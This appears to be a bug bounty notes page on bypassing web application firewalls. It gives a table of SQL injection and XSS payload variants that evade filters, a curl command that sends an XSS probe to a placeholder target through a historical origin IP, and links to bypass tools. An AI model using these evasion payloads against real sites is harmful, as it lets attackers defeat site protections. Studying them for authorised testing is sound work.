WAF Bypass

Blocked Attack	Undetected modification
'or 1=1 --	' or 2=2--
alert(0)	%00alert(0)
<script>alert(0)</script>	<script type=vbscript>MsgBox(0)</script>
' or ""='r	'/**/OR/**/""='
<script>alert(0)</script>	<img src="x:x" onerror="alert(0)"></img>
<img src=x:x onerror=alert(0)//></img>	<img src=http://url onload=alert(0)//></img>
1 or 1=1	(1)or(1)=(1)
eval(name)	x=this.name
eval(name)	X(0?$:name+1)

bypasswaf - Burp Extension

GitHub - codewatchorg/bypasswaf: Add headers to all Burp requests to bypass some WAF productsGitHub

nowafpls - Burp Extension

GitHub - assetnote/nowafpls: Burp Plugin to Bypass WAFs through the insertion of Junk DataGitHub

Bypass WAF using historical IP

GitHub - vincentcox/bypass-firewalls-by-DNS-history: Firewall bypass script based on DNS history records. This script will search for DNS A history records and check if the server replies for that domain. Handy for bugbounty hunters.GitHub

How to Find Origin IP of any Website Behind a WAFMedium

curl -k -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 YWH-UA" --resolve target.com:443:[HISTORICAL_IP] 'https://target.com/?s="><script>alert(1)</script>'

GitHub - mrh0wl/Cloudmare: Cloudflare, Sucuri, Incapsula real IP tracker.GitHub

WAF Community Bypasses

GitHub - waf-bypass-maker/waf-community-bypassesGitHub

GitHub - 0xInfection/Awesome-WAF: Everything about Web Application Firewalls (WAFs) from Security Standpoint! 🔥GitHub

WAF Bypass Arsenal by @vgrichinawafbypass.berrry.app

Cookie Version

Bypassing WAFs with the phantom $Version cookiePortSwigger Research

Tools

GitHub - nemesida-waf/waf-bypass: Check your WAF before an attacker doesGitHub

WhatWaf

GitHub - Ekultek/WhatWaf: Detect and bypass web application firewalls and protection systemsGitHub

EvilWAF

GitHub - matrixleons/evilwaf: evilwaf is a penetration testing tool designed to detect and bypass common Web Application Firewalls (WAFs).GitHub

SaldiScript

GitHub - Cyberheroess/Saldiscript: Bypass WAF payload adaptifGitHub

Caliper

GitHub - XoanOuteiro/caliper: Discover WAF bypass vectors for any payload on any HTTP method, the civilized way.GitHub

Resources

Payload obfuscation: Masking malicious scripts and bypassing defencesYesWeHack

GitHub - 0xInfection/Awesome-WAF: Everything about Web Application Firewalls (WAFs) from Security Standpoint! 🔥GitHub

Interesting Books

Interesting Books

Disclaimer: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you.

• The Web Application Hacker’s Handbook The go-to manual for web app pentesters. Covers XSS, SQLi, logic flaws, and more

• Bug Bounty Bootcamp: The Guide to Finding and Reporting Web Vulnerabilities Learn how to perform reconnaissance on a target, how to identify vulnerabilities, and how to exploit them

• Real-World Bug Hunting: A Field Guide to Web Hacking Learn about the most common types of bugs like cross-site scripting, insecure direct object references, and server-side request forgery.

Support this Gitbook

I hope it helps you as much as it has helped me. If you can support me in any way, I would deeply appreciate it.